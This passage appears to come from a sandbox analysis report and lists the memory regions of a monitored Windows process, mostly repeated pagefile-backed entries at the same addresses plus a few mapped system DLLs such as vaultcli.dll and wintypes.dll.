name = "pagefile_0x0000000002990000" filename = "" Region: id = 1817 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1818 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1819 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1820 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1821 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1822 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1823 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1824 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1825 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1826 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1827 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1828 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1829 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1830 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1831 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1832 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1833 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1834 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1835 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1836 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1837 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1838 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1839 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1840 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1841 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1842 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1843 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1844 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1845 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1846 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1847 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1848 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1849 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1850 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1851 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1852 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1853 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1854 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1855 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1856 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1857 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1858 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1859 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1860 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1861 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1862 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1863 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1864 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1865 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1866 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1867 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1868 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1869 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1870 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1871 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1872 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1873 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1874 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1875 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1876 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1877 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1878 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1879 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1880 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1881 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1882 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1883 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1884 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1885 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1886 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1887 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1888 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1889 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1890 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1891 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1892 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1893 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1894 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1895 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1896 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1897 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1898 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1899 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1900 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1901 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1902 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1903 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1904 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1905 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1906 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1907 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1908 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1909 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1910 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1911 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1912 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1913 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1914 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1915 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1916 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1917 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1918 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1919 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1920 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1921 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1922 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1923 start_va = 0x3c70000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c70000" filename = "" Region: id = 1924 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1925 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1926 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1927 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1928 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1929 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1930 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1931 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1932 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1933 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1934 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1935 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1936 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1937 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1938 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1939 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1940 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1941 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1942 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1943 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1944 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1945 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1946 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1947 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1948 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1949 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1950 start_va = 0x2990000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 1951 start_va = 0x6cc50000 end_va = 0x6cc89fff monitored = 0 entry_point = 0x6cc69be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 1952 start_va = 0x741f0000 end_va = 0x742b7fff monitored = 0 entry_point = 0x7425ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 1953 start_va = 0x2990000 end_va = 0x2993fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 1954 start_va = 0x3c70000 end_va = 0x3c74fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 1955 start_va = 0x3c80000 end_va = 0x3c8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 1956 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 1957 start_va = 0x3de0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003de0000" filename = "" Region: id = 1958 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1959 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1960 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1961 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1962 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1963 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1964 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1965 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1966 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1967 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1968 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1969 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1970 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1971 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1972 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1973 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1974 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1975 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1976 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1977 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1978 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1979 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1980 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1981 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1982 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1983 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1984 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1985 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1986 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1987 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1988 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1989 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1990 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1991 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1992 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1993 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1994 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1995 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1996 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c90000" filename = "" Region: id = 1997 start_va = 0x3c90000 end_va = 0x3c9ffff monitored = 1 entry_point = 0x0 region_type = 